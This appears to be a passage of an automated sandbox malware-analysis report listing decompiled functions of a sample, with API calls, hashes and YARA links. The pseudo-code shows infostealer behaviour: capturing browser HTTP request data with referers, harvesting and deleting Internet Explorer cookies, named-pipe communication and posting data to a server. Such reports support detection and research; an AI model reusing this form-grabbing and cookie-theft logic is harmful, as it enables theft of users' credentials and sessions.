      • Part of subcall function 00408F6C: lstrcpyW.KERNEL32(?,?), ref: 00408F83
    • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 004092A3
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 004092BB
    • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 004092D6
    • WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 004092F2
    • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040930B
    • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409325
    • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040933E
    • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040935B
    • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 00409386
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 004093BD
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
    • String ID:
    • API String ID: 34731080-0
    • Opcode ID: acf49d5069829d18e8d055bb5ab940e12132ee8fc100e9ae9a6354386905a5a4
    • Instruction ID: 793387bd3e43ffc3ab524ebef3089776e3cbd20682da619de251a1ee892e55a9
    • Opcode Fuzzy Hash: acf49d5069829d18e8d055bb5ab940e12132ee8fc100e9ae9a6354386905a5a4
    • Instruction Fuzzy Hash: 80412BB2100109BBDF219FA4DC84DEF3B6CAB49350F10853AFE51E62D1E7788E558BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C32A, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 257networkCOMMON
    Download Yara Rule
    C-Code - Quality: 82%
    			E0040C32A(signed short __edx, char* __esi, intOrPtr _a4) {
				long _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v60;
				char* _v64;
				void _v72;
				void* _v80;
				char _v340;
				void _v1364;
				void* __ebx;
				char _t70;
				char _t72;
				signed int _t82;
				signed int _t97;
				char* _t98;
				intOrPtr _t109;
				int _t119;
				short _t120;
				signed int _t121;
				long _t126;
				long _t128;
				int _t129;
				signed int _t130;
				char _t131;
				intOrPtr _t132;
				char* _t135;
				intOrPtr _t140;
				void* _t141;
				intOrPtr* _t143;
				char* _t145;
				void* _t146;

				_t145 = __esi;
				_t138 = __edx;
				_v12 = _v12 | 0xffffffff;
				_t149 = __esi[0x414];
				if(__esi[0x414] == 0) {
					L25:
					_t70 = _t145[0x41c];
					if(_t70 > 0xea60) {
						L55:
						return 1;
					}
					if(_v12 != 0xffff) {
						L31:
						_t72 = _t145[0x41c];
						_t126 = 0;
						if(_t72 <= 0) {
							L41:
							_v16 = 0;
							_v12 = 0;
							_t140 = 0xc;
							if(_t145[4] != 0x73 || _t145[5] != 0x3a) {
								L44:
								_v20 = 0xb;
								goto L45;
							} else {
								_v20 = _t140;
								if(_t145[6] == 0x2f) {
									L45:
									_push( &_v16);
									_push( &_v12);
									E00405622();
									if(_v20 == _t140) {
										 *0x412dd4(0x412e1c);
										E0040A9FB(_t138, _a4, _t145,  &_v12,  &_v16);
										 *0x412dd8(0x412e1c);
									}
									_v8 = 0x3ff;
									if(HttpQueryInfoA(_t145[0x420], 0x80000023,  &_v1364,  &_v8, 0) == 0 || _v8 == 0) {
										_v8 = 1;
										_v1364 = 0x2d;
									}
									 *((char*)(_t146 + _v8 - 0x550)) = 0;
									_t141 = E0040D379(_t145[0x400], _t145);
									_t82 = 0x40377c;
									_t130 = _t126;
									if(_t126 == 0) {
										_t130 = 0x40377c;
									}
									_t177 = _v12;
									if(_v12 != 0) {
										_t82 = _v12;
									}
									_push(_t130);
									_push(_t82);
									_push( &_v1364);
									E00410EC7(_t130, _t138, _t177, _v20, _t141, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t145);
									E0040CF40(_t141);
									E0040CF40(_v12);
									E0040CF40(_t126);
									goto L55;
								}
								goto L44;
							}
						}
						_t93 = _t72 + 1;
						if(_t72 + 1 == 0) {
							goto L55;
						}
						_t126 = E0040CF2D(_t93);
						if(_t126 == 0) {
							goto L55;
						}
						E0040CF7C(_t126, _t145[0x418], _t145[0x41c]);
						 *((char*)(_t126 + _t145[0x41c])) = 0;
						_t138 = 0;
						if(_t145[0x41c] <= 0) {
							goto L41;
						}
						_t97 = 0;
						do {
							_t98 = _t97 + _t126;
							_t131 =  *_t98;
							if(_t131 != 0x26) {
								__eflags = _t131 - 0x2b;
								if(_t131 == 0x2b) {
									 *_t98 = 0x20;
								}
							} else {
								 *_t98 = 0xa;
							}
							_t138 = _t138 + 1;
							_t97 = _t138 & 0x0000ffff;
						} while (_t97 < _t145[0x41c]);
						goto L41;
					}
					if(_t145[0x404] != 0x50 || _t70 < 5) {
						goto L55;
					} else {
						_v8 = 0x31;
						if(HttpQueryInfoA(_t145[0x420], 0x80000001,  &_v72,  &_v8, 0) == 0) {
							goto L55;
						}
						_t132 =  *0x412a64; // 0x246f5a8
						_t138 = _v8;
						if(E0040D3EC( &_v72 | 0xffffffff,  *((intOrPtr*)(_t132 + 0x11c)), _v8,  &_v72) != 0) {
							goto L55;
						}
						goto L31;
					}
				}
				_t143 = E0040FE8D( &_v8, __edx, _t149, _a4, 0x4e26, 0x20000000);
				_v16 = _t143;
				if(_t143 == 0) {
					goto L25;
				}
				if(E0040D5F3(_t105, _v8) == 0) {
					L24:
					E0040CF40(_v16);
					if(_v12 == 0) {
						goto L55;
					}
					goto L25;
				} else {
					goto L3;
				}
				do {
					L3:
					_t8 = _t143 + 1; // 0x1
					_t135 = _t8;
					if( *_t135 == 0) {
						goto L12;
					}
					_t109 =  *_t143;
					_t128 = 0;
					if(_t109 != 0x2d) {
						__eflags = _t109 - 0x40;
						if(_t109 != 0x40) {
							__eflags = _t109 - 0x21;
							if(_t109 != 0x21) {
								goto L11;
							}
							_t128 = 1;
							goto L10;
						}
						_t128 = 2;
						goto L10;
					} else {
						_t128 = 3;
						L10:
						_t143 = _t135;
						L11:
						_t137 = _t143;
						_t138 = E0040D3C6(_t143);
						if(E00408C0D(_t143, _t110, _t145, _t145[0x400], 0, 0, 2) != 0) {
							__eflags = _t128 - 1;
							_v12 = (0 | _t128 != 0x00000001) & 0x0000ffff;
							__eflags = _t128 - 3;
							if(_t128 != 3) {
								__eflags = _t128 - 2;
								if(_t128 != 2) {
									goto L24;
								}
								_t138 = 0x3c;
								E0040CFFE( &_v80,  &_v80, 0, _t138);
								_v64 =  &_v340;
								_v80 = _t138;
								_v60 = 0x103;
								_t119 = InternetCrackUrlA(_t145, _t145[0x400], 0,  &_v80);
								__eflags = _t119;
								if(_t119 == 0) {
									L20:
									_t129 = 0;
									__eflags = 0;
									L21:
									_t120 = 0x14;
									 *0x41272c = _t120;
									_t121 = E0040CF40( *0x412724);
									__eflags = _t129;
									if(_t129 == 0) {
										 *0x412724 = 0;
									} else {
										 *0x412724 = E0040D379(_t121 | 0xffffffff, _t129);
									}
									goto L24;
								}
								__eflags = _v60;
								if(_v60 == 0) {
									goto L20;
								}
								_t129 =  &_v340;
								goto L21;
							}
							E0040A193(_t137, _t138, _t145, _t145);
							return 0;
						}
					}
					L12:
					_t143 = E0040D611(_t143, 1);
				} while (_t143 != 0);
				goto L24;
			}



































    0x0040c32a
    0x0040c32a
    0x0040c333
    0x0040c337
    0x0040c340
    0x0040c47e
    0x0040c47e
    0x0040c489
    0x0040c661
    0x00000000
    0x0040c661
    0x0040c494
    0x0040c4f9
    0x0040c4f9
    0x0040c501
    0x0040c505
    0x0040c569
    0x0040c56f
    0x0040c572
    0x0040c575
    0x0040c576
    0x0040c587
    0x0040c587
    0x00000000
    0x0040c57e
    0x0040c582
    0x0040c585
    0x0040c58e
    0x0040c591
    0x0040c595
    0x0040c596
    0x0040c59e
    0x0040c5a6
    0x0040c5b8
    0x0040c5be
    0x0040c5be
    0x0040c5dc
    0x0040c5eb
    0x0040c5f3
    0x0040c5fa
    0x0040c5fa
    0x0040c604
    0x0040c618
    0x0040c61a
    0x0040c61f
    0x0040c623
    0x0040c625
    0x0040c625
    0x0040c627
    0x0040c62b
    0x0040c62d
    0x0040c62d
    0x0040c630
    0x0040c631
    0x0040c638
    0x0040c645
    0x0040c64e
    0x0040c656
    0x0040c65c
    0x00000000
    0x0040c65c
    0x00000000
    0x0040c585
    0x0040c576
    0x0040c507
    0x0040c50a
    0x00000000
    0x00000000
    0x0040c515
    0x0040c519
    0x00000000
    0x00000000
    0x0040c52c
    0x0040c537
    0x0040c53b
    0x0040c543
    0x00000000
    0x00000000
    0x0040c545
    0x0040c547
    0x0040c547
    0x0040c549
    0x0040c54e
    0x0040c555
    0x0040c558
    0x0040c55a
    0x0040c55a
    0x0040c550
    0x0040c550
    0x0040c550
    0x0040c55d
    0x0040c55e
    0x0040c561
    0x00000000
    0x0040c547
    0x0040c49d
    0x00000000
    0x0040c4ac
    0x0040c4c1
    0x0040c4d0
    0x00000000
    0x00000000
    0x0040c4d6
    0x0040c4dc
    0x0040c4f3
    0x00000000
    0x00000000
    0x00000000
    0x0040c4f3
    0x0040c49d
    0x0040c35b
    0x0040c35d
    0x0040c362
    0x00000000
    0x00000000
    0x0040c372
    0x0040c46b
    0x0040c46e
    0x0040c478
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040c378
    0x0040c378
    0x0040c378
    0x0040c378
    0x0040c37e
    0x00000000
    0x00000000
    0x0040c380
    0x0040c382
    0x0040c386
    0x0040c38d
    0x0040c38f
    0x0040c395
    0x0040c397
    0x00000000
    0x00000000
    0x0040c399
    0x00000000
    0x0040c399
    0x0040c391
    0x00000000
    0x0040c388
    0x0040c388
    0x0040c39b
    0x0040c39b
    0x0040c39d
    0x0040c3a9
    0x0040c3b1
    0x0040c3ba
    0x0040c3d2
    0x0040c3db
    0x0040c3de
    0x0040c3e1
    0x0040c3f0
    0x0040c3f3
    0x00000000
    0x00000000
    0x0040c3f7
    0x0040c400
    0x0040c40b
    0x0040c419
    0x0040c41d
    0x0040c424
    0x0040c42a
    0x0040c42c
    0x0040c43b
    0x0040c43b
    0x0040c43b
    0x0040c43d
    0x0040c43f
    0x0040c446
    0x0040c44c
    0x0040c451
    0x0040c453
    0x0040c465
    0x0040c455
    0x0040c45e
    0x0040c45e
    0x00000000
    0x0040c453
    0x0040c42e
    0x0040c431
    0x00000000
    0x00000000
    0x0040c433
    0x00000000
    0x0040c433
    0x0040c3e4
    0x00000000
    0x0040c3e9
    0x0040c3ba
    0x0040c3bc
    0x0040c3c5
    0x0040c3c7
    0x00000000

    APIs
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040C424
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040C4C8
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C5A6
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C5BE
    • HttpQueryInfoA.WININET(?,80000023,?,00000073,00000000), ref: 0040C5E3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
    • String ID: %SReferer: %S%SData:%S$-$1
    • API String ID: 1405552099-909787007
    • Opcode ID: 92c1cd974efd318a2f7cdd9157a088569db87c9fb5ed9542bc1bd25208fdb701
    • Instruction ID: 71a5e4bb34e465ab12082061d04cd60712991b3470c0252b202ee509c10b25b7
    • Opcode Fuzzy Hash: 92c1cd974efd318a2f7cdd9157a088569db87c9fb5ed9542bc1bd25208fdb701
    • Instruction Fuzzy Hash: 539101B0900608EADB31DBB4CCC4BEF7BB9EB45304F14867BE511B62C1D7795A868B19
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C669, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 138networkCOMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E0040C669(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t32;
				DWORD* _t36;
				void _t38;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				intOrPtr _t45;
				signed int _t47;
				signed int _t55;
				DWORD* _t58;
				signed int _t64;
				char* _t67;
				void* _t72;

				_t64 = __edx;
				_t61 = __ecx;
				_push(__ecx);
				_t67 = __eax;
				_t58 = __eax + 0x400;
				 *_t58 = 0x3fc;
				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
					L21:
					_t31 = 0;
					__eflags = 0;
					L22:
					return _t31;
				}
				_t32 =  *_t58;
				if(_t32 <= 8) {
					goto L21;
				}
				 *((char*)(_t32 + _t67)) = 0;
				 *0x412dd4(0x412e1c);
				E0040AF73(_t67,  *_t58);
				 *0x412dd8(0x412e1c);
				_t36 = _t67 + 0x410;
				_t72 = _t67 + 0x404;
				 *_t36 = 9;
				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
					goto L21;
				}
				_t38 =  *_t72;
				if(_t38 == 0x47) {
					L5:
					if(E004077D0(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
						_t40 = E004039A2(_t61);
						__eflags = _t40;
						_v8 = _t40;
						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
						 *(_t67 + 0x420) = _a4;
						_t43 = _a12;
						 *((intOrPtr*)(_t67 + 0x42c)) = 0;
						 *((intOrPtr*)(_t67 + 0x428)) = 0;
						__eflags = _t43;
						if(_t43 == 0) {
							L11:
							 *(_t67 + 0x41c) = 0;
							 *(_t67 + 0x418) = 0;
							L12:
							_t44 = E0040C32A(_t64, _t67, _v8);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L6;
							}
							_t45 =  *0x412a64; // 0x246f5a8
							_t63 =  *((intOrPtr*)(_t45 + 0x140));
							_t65 = E0040D3C6( *((intOrPtr*)(_t45 + 0x140)));
							_t47 = E00408C0D( *((intOrPtr*)(_t45 + 0x140)), _t46, _t67,  *_t58, 0, 0, 0);
							__eflags = _t47;
							if(_t47 != 0) {
								_t55 = E0040D0D5( *_t58, _t67);
								__eflags = _t55;
								if(_t55 != 0) {
									E0040A04D(_t63, E0040A34A, _t55);
								}
							}
							__eflags =  *((char*)(_t67 + 0x414));
							if(__eflags != 0) {
								 *0x412dd4(0x412e1c);
								_t60 = _v8;
								__eflags = E0040ADF1(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040BFA6);
								if(__eflags == 0) {
									E0040ADF1(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040B271);
									E0040B073(_t65, _t60, _t67);
								} else {
									 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000002;
								}
								 *0x412dd8(0x412e1c);
								E0040CF40(_t60);
							}
							L7:
							_t31 = 1;
							goto L22;
						}
						_t64 = _a8;
						__eflags = _t64;
						if(_t64 == 0) {
							goto L11;
						} else {
							 *(_t67 + 0x41c) = _t43;
							 *(_t67 + 0x418) = _t64;
							goto L12;
						}
					}
					L6:
					 *(_t67 + 0x424) =  *(_t67 + 0x424) | 0x00000004;
					SetLastError(0x2f78);
					goto L7;
				}
				_t80 = _t38 - 0x50;
				if(_t38 != 0x50) {
					goto L21;
				}
				goto L5;
			}




















    0x0040c669
    0x0040c669
    0x0040c66c
    0x0040c670
    0x0040c672
    0x0040c67f
    0x0040c68d
    0x0040c822
    0x0040c822
    0x0040c822
    0x0040c824
    0x0040c828
    0x0040c828
    0x0040c693
    0x0040c698
    0x00000000
    0x00000000
    0x0040c6a4
    0x0040c6a8
    0x0040c6b1
    0x0040c6b7
    0x0040c6bf
    0x0040c6c6
    0x0040c6d2
    0x0040c6e0
    0x00000000
    0x00000000
    0x0040c6e6
    0x0040c6ea
    0x0040c6f4
    0x0040c703
    0x0040c71e
    0x0040c725
    0x0040c727
    0x0040c72d
    0x0040c736
    0x0040c73c
    0x0040c73f
    0x0040c745
    0x0040c74b
    0x0040c74d
    0x0040c764
    0x0040c764
    0x0040c76a
    0x0040c770
    0x0040c775
    0x0040c77a
    0x0040c77c
    0x00000000
    0x00000000
    0x0040c77e
    0x0040c783
    0x0040c796
    0x0040c798
    0x0040c79d
    0x0040c79f
    0x0040c7a4
    0x0040c7a9
    0x0040c7ab
    0x0040c7b3
    0x0040c7b3
    0x0040c7ab
    0x0040c7b8
    0x0040c7bf
    0x0040c7cb
    0x0040c7d1
    0x0040c7e8
    0x0040c7ea
    0x0040c804
    0x0040c80b
    0x0040c7ec
    0x0040c7ec
    0x0040c7ec
    0x0040c811
    0x0040c818
    0x0040c818
    0x0040c717
    0x0040c717
    0x00000000
    0x0040c717
    0x0040c74f
    0x0040c752
    0x0040c754
    0x00000000
    0x0040c756
    0x0040c756
    0x0040c75c
    0x00000000
    0x0040c75c
    0x0040c754
    0x0040c705
    0x0040c705
    0x0040c711
    0x00000000
    0x0040c711
    0x0040c6ec
    0x0040c6ee
    0x00000000
    0x00000000
    0x00000000

    APIs
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040C685
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C6A8
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C6B7
    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040C6D8
    • SetLastError.KERNEL32(00002F78), ref: 0040C711
      • Part of subcall function 004039A2: CreateMutexW.KERNEL32(Function_00013468,00000000,?), ref: 004039BD
    • RtlEnterCriticalSection.NTDLL(00412E1C), ref: 0040C7CB
    • RtlLeaveCriticalSection.NTDLL(00412E1C), ref: 0040C811
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
    • String ID: 809dslffsdfsdfgg
    • API String ID: 4246016607-2949297782
    • Opcode ID: eda03fbfd5d2274552fec76bbb9e35b8325dbdbcbf5ed9149d858ef5e03f37e4
    • Instruction ID: a0d78f86d9eb82c2925dd54ff855815cec7d7fda480595f3d41f086c91a33206
    • Opcode Fuzzy Hash: eda03fbfd5d2274552fec76bbb9e35b8325dbdbcbf5ed9149d858ef5e03f37e4
    • Instruction Fuzzy Hash: 1041C2B1640201FBC7249B61CD85FDB7BA9EF45754F00823AF605B72C1C77859618BAE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040F9F9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113filepipeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040F9F9(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
				long _v8;
				struct _OVERLAPPED* _v12;
				void _v16;
				char _v518;
				short _v536;
				intOrPtr* _t28;
				int _t35;
				void** _t54;
				void* _t61;
				void* _t66;

				_t28 = _a12;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				E0040CF7C( &_v536, L"\\\\.\\pipe\\", 0x12);
				_v518 = 0;
				E0040D08C(0xffffffff, _a4,  &_v518);
				_a7 = 0;
				while(1) {
					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
					_t61 = _t35;
					if(_t61 != 0xffffffff) {
						break;
					}
					if(_a7 == 1) {
						L14:
						return _t35;
					}
					WaitNamedPipeW( &_v536, 0xffffffff);
					_a7 = _a7 + 1;
				}
				_v8 = 2;
				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) == 0) {
					L13:
					_t35 = CloseHandle(_t61);
					goto L14;
				}
				_v16 = _a8;
				_v12 = 0;
				if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || ReadFile(_t61,  &_v16, 8,  &_v8, 0) == 0 || _v8 != 8) {
					goto L13;
				} else {
					_t48 =  &(_v12->Internal);
					if( &(_v12->Internal) != 0) {
						_t66 = E0040CF2D(_t48);
						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
							L12:
							E0040CF40(_t66);
						} else {
							_t54 = _a12;
							if(_t54 != 0) {
								 *_t54 = _t66;
							}
						}
						goto L13;
					}
					_t66 = 0;
					goto L12;
				}
			}













    0x0040f9fc
    0x0040fa0c
    0x0040fa0e
    0x0040fa0e
    0x0040fa1e
    0x0040fa28
    0x0040fa38
    0x0040fa3d
    0x0040fa63
    0x0040fa72
    0x0040fa78
    0x0040fa7d
    0x00000000
    0x00000000
    0x0040fa4b
    0x0040fae9
    0x0040faed
    0x0040faed
    0x0040fa5a
    0x0040fa60
    0x0040fa60
    0x0040fa86
    0x0040fa95
    0x0040fae2
    0x0040fae3
    0x00000000
    0x0040fae3
    0x0040fa9b
    0x0040faa9
    0x0040fab4
    0x00000000
    0x0040fad2
    0x0040fad5
    0x0040fad8
    0x0040faf5
    0x0040faf9
    0x0040fadc
    0x0040fadd
    0x0040fb17
    0x0040fb17
    0x0040fb1c
    0x0040fb1e
    0x0040fb1e
    0x0040fb1c
    0x00000000
    0x0040faf9
    0x0040fada
    0x00000000
    0x0040fada

    APIs
    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 0040FA5A
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00403914,00000000), ref: 0040FA72
    • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040FA8D
    • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAAC
    • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 0040FAC2
    • CloseHandle.KERNEL32(00000000), ref: 0040FAE3
    • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 0040FB05
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$HandleNamedPipeRead$CloseCreateStateWaitWrite
    • String ID: \\.\pipe\
    • API String ID: 223520675-91387939
    • Opcode ID: c8fe5c17bf30876f462e9769f900a7707d25c9f3800f2c9fcfa7db90d9c55780
    • Instruction ID: 0a883ac6afbc9c71e3c9addf3b5ba292e350c96f0d65484af3babfe2f78e3db4
    • Opcode Fuzzy Hash: c8fe5c17bf30876f462e9769f900a7707d25c9f3800f2c9fcfa7db90d9c55780
    • Instruction Fuzzy Hash: CC317E71A00108ABDB21DFA4DD88EEF77BCEB04314F108576B519E61C0E6749E49CB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004046AA, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E004046AA(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
				signed int _v528;
				short _v536;
				intOrPtr _v540;
				long _v544;
				char _v545;
				intOrPtr _v548;
				intOrPtr _v552;
				void* _v556;
				char _v557;
				void* _v560;
				intOrPtr _v561;
				intOrPtr _v564;
				long _v568;
				signed int _t35;
				void* _t39;
				signed int _t55;
				intOrPtr _t70;
				signed int* _t71;
				struct _GOPHER_FIND_DATAA _t73;

				_t71 = __edi;
				_t66 = __ecx;
				_t35 = _a4 & 0x00000001;
				_v528 = _t35;
				if(_t35 != 0) {
					 *_a8 =  *_a8 & 0x00000000;
					 *__edi =  *__edi & 0x00000000;
				}
				_v545 = 1;
				_t73 = E0040CF2D(0x1000);
				_v544 = 0x1000;
				 *_t73 = 0x50;
				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
				_v544 = _t39;
				if(_t39 == 0) {
					L14:
					E0040CF40(_t73);
					return _v561;
				} else {
					do {
						_t81 = _v540;
						if(_v540 == 0) {
							__eflags = _a4 & 0x00000002;
							if(__eflags == 0) {
								 *0x412a60( *((intOrPtr*)(_t73 + 4)));
							} else {
								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
								E00410F35(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
							}
							goto L10;
						}
						_t66 = E00404550(_t66, _t81,  *(_t73 + 8));
						_v556 = _t66;
						if(_t66 == 0) {
							goto L10;
						}
						_v548 = E0040D3C6(_t66);
						_t55 = E0040CEF9( *_t71 + _v548,  *_a8);
						if(_t55 == 0) {
							_v557 = 0;
							E0040CF40(_v552);
							E0040CF40( *_a8);
							L13:
							FindCloseUrlCache(_v560);
							goto L14;
						}
						_t70 = _v548;
						 *_a8 = _t55;
						_t66 =  *_t71 + _t55;
						E0040CF7C( *_t71 + _t55, _v552, _t70);
						 *_t71 =  *_t71 + _t70;
						E0040CF40(_v564);
						L10:
						_v560 = 0x1000;
						 *_t73 = 0x50;
						E0040CFEC(_t73, 0x1000);
					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
					goto L13;
				}
			}






















    0x004046aa
    0x004046aa
    0x004046ba
    0x004046be
    0x004046c2
    0x004046c7
    0x004046ca
    0x004046ca
    0x004046d4
    0x004046de
    0x004046e6
    0x004046ef
    0x004046f5
    0x004046fb
    0x00404701
    0x004047f1
    0x004047f2
    0x00404800
    0x00404707
    0x00404707
    0x00404707
    0x0040470c
    0x0040476a
    0x0040476e
    0x0040479e
    0x00404770
    0x00404784
    0x00404794
    0x00404794
    0x00000000
    0x0040476e
    0x00404716
    0x00404718
    0x0040471e
    0x00000000
    0x00000000
    0x0040472e
    0x00404738
    0x0040473f
    0x004047d3
    0x004047d8
    0x004047e2
    0x004047e7
    0x004047eb
    0x00000000
    0x004047eb
    0x00404748
    0x0040474c
    0x00404755
    0x00404758
    0x00404761
    0x00404763
    0x004047a4
    0x004047a5
    0x004047aa
    0x004047b0
    0x004047c5
    0x00000000
    0x004047cd

    APIs
    • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 004046F5
    • PathFindFileNameW.SHLWAPI(?), ref: 00404773
    • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 00404784
    • DeleteUrlCacheEntryW.WININET(?), ref: 0040479E
    • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 004047BF
    • FindCloseUrlCache.WININET(?), ref: 004047EB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CacheFind$Entry$Path$CloseCombineDeleteFileFirstNameNext
    • String ID: cookie:$ie_cookies
    • API String ID: 468235262-2556801673
    • Opcode ID: 28270154a2a1dc988ffc64f0e58ce96469c7ffababa994f0f5b97b5cbc91b1eb
    • Instruction ID: 60296334ffd9ab9eb6bc6b232d26fe1a598f650a24ecf662e698e03cfb45d14c
    • Opcode Fuzzy Hash: 28270154a2a1dc988ffc64f0e58ce96469c7ffababa994f0f5b97b5cbc91b1eb
    • Instruction Fuzzy Hash: 3C418AB0004302EFC710AF65C881A6BBBE9AF85304F00893EF594A22E1D779D954CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040D7CF, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 59networkCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040D7CF(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t19;
				void* _t21;
				char* _t27;
				void* _t29;

				_t19 = 0x8404f300;
				if((_a20 & 0x00000002) != 0) {
					_t19 = 0x8444f300;
				}
				if((_a20 & 0x00000004) != 0) {
					_t19 = _t19 | 0x00800000;
				}
				_t27 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t27 = "GET";
				}
				_t29 = HttpOpenRequestA(_a4, _t27, _a8, "HTTP/1.1", 0, "D8@", _t19, 0);
				if(_t29 == 0) {
					L12:
					_t21 = 0;
				} else {
					if(HttpSendRequestA(_t29, 0, 0, _a12, _a16) == 0) {
						L11:
						InternetCloseHandle(_t29);
						goto L12;
					} else {
						_a20 = 0;
						_a8 = 4;
						if(HttpQueryInfoA(_t29, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L11;
						} else {
							_t21 = _t29;
						}
					}
				}
				return _t21;
			}







    0x0040d7d6
    0x0040d7db
    0x0040d7dd
    0x0040d7dd
    0x0040d7e6
    0x0040d7e8
    0x0040d7e8
    0x0040d7f1
    0x0040d7f6
    0x0040d7f8
    0x0040d7f8
    0x0040d81b
    0x0040d81f
    0x0040d86b
    0x0040d86b
    0x0040d821
    0x0040d832
    0x0040d864
    0x0040d865
    0x00000000
    0x0040d834
    0x0040d843
    0x0040d846
    0x0040d855
    0x00000000
    0x0040d860
    0x0040d860
    0x0040d860
    0x0040d855
    0x0040d832
    0x0040d870

    APIs
    • HttpOpenRequestA.WININET(?,POST,00000000,HTTP/1.1,00000000,D8@,8404F300,00000000), ref: 0040D815
    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040D82A
    • HttpQueryInfoA.WININET(00000000,20000013,00000001,00000000,00000000), ref: 0040D84D
    • InternetCloseHandle.WININET(00000000), ref: 0040D865
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
